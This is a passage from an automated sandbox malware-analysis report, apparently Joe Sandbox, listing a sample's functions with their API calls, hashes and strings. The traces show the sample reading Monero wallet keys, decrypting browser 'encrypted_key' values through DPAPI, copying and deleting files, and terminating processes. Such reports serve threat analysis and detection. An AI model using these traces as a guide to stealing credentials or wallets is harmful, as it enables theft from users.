                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: 72017054f14f574a8f78d526e8fd9fc3dab9056c80e2026b15513799e29e7889
                  • Instruction ID: f0d80232123b539215a858df185df05d9cc8aac3c524b54d8742de1d495867c6
                  • Opcode Fuzzy Hash: 72017054f14f574a8f78d526e8fd9fc3dab9056c80e2026b15513799e29e7889
                  • Instruction Fuzzy Hash: A9E0ECB5A40208FBD710DB94DD4AE697BBCEB48702F044198FD099B280DE75AE109B96
                  Function 009AA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009B8B60: GetSystemTime.KERNEL32(009C0E1A,015EB008,009C05AE,?,?,009A13F9,?,0000001A,009C0E1A,00000000,?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009B8B86
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009AA2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 009AA3FF
                  • lstrlen.KERNEL32(00000000), ref: 009AA6BC
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 009AA743
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 5ee61e891705499cf5eae6ca687938664c034e3afe9e85dee0ce28c799b841d1
                  • Instruction ID: df10775cdff5b553fb23924ce887159cc65a51c2180a9aa15000667b855e7db3
                  • Opcode Fuzzy Hash: 5ee61e891705499cf5eae6ca687938664c034e3afe9e85dee0ce28c799b841d1
                  • Instruction Fuzzy Hash: 34E1FD72C10108ABDB14FBA4DEA2FEE733CAF94710F508159F516764A1EF306A49CB66
                  Function 009AD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009B8B60: GetSystemTime.KERNEL32(009C0E1A,015EB008,009C05AE,?,?,009A13F9,?,0000001A,009C0E1A,00000000,?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009B8B86
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009AD481
                  • lstrlen.KERNEL32(00000000), ref: 009AD698
                  • lstrlen.KERNEL32(00000000), ref: 009AD6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 009AD72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 009bf4555a5656f65f0df43a19f88d6b69572ee8f0ab96cafdf051f77a96689c
                  • Instruction ID: 3cc46141faf7e3e9ac92440951821d80eb9099ecc0f6c9f6cb147efa81e04830
                  • Opcode Fuzzy Hash: 009bf4555a5656f65f0df43a19f88d6b69572ee8f0ab96cafdf051f77a96689c
                  • Instruction Fuzzy Hash: 97910172C10108AADB14FBA4DEA6FEE733CAF94710F504158F50776491EF346A09CB66
                  Function 009AD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009B8B60: GetSystemTime.KERNEL32(009C0E1A,015EB008,009C05AE,?,?,009A13F9,?,0000001A,009C0E1A,00000000,?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009B8B86
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009AD801
                  • lstrlen.KERNEL32(00000000), ref: 009AD99F
                  • lstrlen.KERNEL32(00000000), ref: 009AD9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 009ADA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: baf733742fd4fedb1830ddb9ece55c83b5e5130dcd3f7de61d85911cbbd540e3
                  • Instruction ID: 0c3036ba009558235f875d7156f277aff5ecd646321db6f66a5c45220368124a
                  • Opcode Fuzzy Hash: baf733742fd4fedb1830ddb9ece55c83b5e5130dcd3f7de61d85911cbbd540e3
                  • Instruction Fuzzy Hash: 5C810171910108AADB14FBA4DEA6FEE733DAF94710F504118F507B64A1EF346A09CBA6
                  Function 009AF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009A99EC
                    • Part of subcall function 009A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009A9A11
                    • Part of subcall function 009A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009A9A31
                    • Part of subcall function 009A99C0: ReadFile.KERNEL32(000000FF,?,00000000,009A148F,00000000), ref: 009A9A5A
                    • Part of subcall function 009A99C0: LocalFree.KERNEL32(009A148F), ref: 009A9A90
                    • Part of subcall function 009A99C0: CloseHandle.KERNEL32(000000FF), ref: 009A9A9A
                    • Part of subcall function 009B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009B8E52
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,009C1580,009C0D92), ref: 009AF54C
                  • lstrlen.KERNEL32(00000000), ref: 009AF56B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                  • String ID: ^userContextId=4294967295$moz-extension+++
                  • API String ID: 998311485-3310892237
                  • Opcode ID: 9fdaae0e7f1ab65aa35b990ebf1cbb48c5e19bdf48c4319aa74fe41537249352
                  • Instruction ID: a6b511ca56663ce591a24d6f4cfc9eec7b8dd5abd4559799b6639f9ec532af03
                  • Opcode Fuzzy Hash: 9fdaae0e7f1ab65aa35b990ebf1cbb48c5e19bdf48c4319aa74fe41537249352
                  • Instruction Fuzzy Hash: EC511F71D10108BADB14FBA0DDA6EED737CAFD4710F408528F816A7191EE346A09CBA6
                  Function 009B3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 1f8ca4772efbe02c332b7ef094812e8c51542df573d9c70350631b5ebad5a1d2
                  • Instruction ID: 6bb275bc550bc6085e94aee1d403acc1467f884031843312dfb600e4fdd0a35f
                  • Opcode Fuzzy Hash: 1f8ca4772efbe02c332b7ef094812e8c51542df573d9c70350631b5ebad5a1d2
                  • Instruction Fuzzy Hash: 84412D71D10109EBCB04EFA4DA96BEEB778AB84724F10C41CE41677290DB75AA45CFA2
                  Function 009A9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009A99EC
                    • Part of subcall function 009A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009A9A11
                    • Part of subcall function 009A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009A9A31
                    • Part of subcall function 009A99C0: ReadFile.KERNEL32(000000FF,?,00000000,009A148F,00000000), ref: 009A9A5A
                    • Part of subcall function 009A99C0: LocalFree.KERNEL32(009A148F), ref: 009A9A90
                    • Part of subcall function 009A99C0: CloseHandle.KERNEL32(000000FF), ref: 009A9A9A
                    • Part of subcall function 009B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009B8E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 009A9D39
                    • Part of subcall function 009A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009A4EEE,00000000,00000000), ref: 009A9AEF
                    • Part of subcall function 009A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,009A4EEE,00000000,?), ref: 009A9B01
                    • Part of subcall function 009A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009A4EEE,00000000,00000000), ref: 009A9B2A
                    • Part of subcall function 009A9AC0: LocalFree.KERNEL32(?,?,?,?,009A4EEE,00000000,?), ref: 009A9B3F
                    • Part of subcall function 009A9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 009A9B84
                    • Part of subcall function 009A9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 009A9BA3
                    • Part of subcall function 009A9B60: LocalFree.KERNEL32(?), ref: 009A9BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: 5146470568b2ceeff423995b11d84bfe4640d1e328df7e5b19181b2e21876364
                  • Instruction ID: 2ee6c0a0dfbe5f7db83f2a30b2da681b0c1f6e1cd8a012068a8a86ccf46dbe9e
                  • Opcode Fuzzy Hash: 5146470568b2ceeff423995b11d84bfe4640d1e328df7e5b19181b2e21876364
                  • Instruction Fuzzy Hash: 6D313DB6D10209ABCB04DFE4DD85BEFB7B8BB89304F144519F905A7281EB309A44CBA1
                  Function 009B94D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 009B94EB
                    • Part of subcall function 009B8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009B951E,00000000), ref: 009B8D5B
                    • Part of subcall function 009B8D50: RtlAllocateHeap.NTDLL(00000000), ref: 009B8D62
                    • Part of subcall function 009B8D50: wsprintfW.USER32 ref: 009B8D78
                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 009B95AB
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 009B95C9
                  • CloseHandle.KERNEL32(00000000), ref: 009B95D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                  • String ID:
                  • API String ID: 3729781310-0
                  • Opcode ID: 851eb8d69dde14cfa1a87c2b020eff5e65da2b0a9f8814f8283cc04eb1c69812
                  • Instruction ID: 6f1c7710762b97d35c6a049acdb8a85613ee4cdbd5e2145965f345a18d745605
                  • Opcode Fuzzy Hash: 851eb8d69dde14cfa1a87c2b020eff5e65da2b0a9f8814f8283cc04eb1c69812
                  • Instruction Fuzzy Hash: B1310C71A5024CAFDB14DBE0CD89BEDB778EF44710F104459F606AF184DBB4AA89CB51
                  Function 009B92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(009B3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,009B3AEE,?), ref: 009B92FC
                  • GetFileSizeEx.KERNEL32(000000FF,009B3AEE), ref: 009B9319
                  • CloseHandle.KERNEL32(000000FF), ref: 009B9327
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
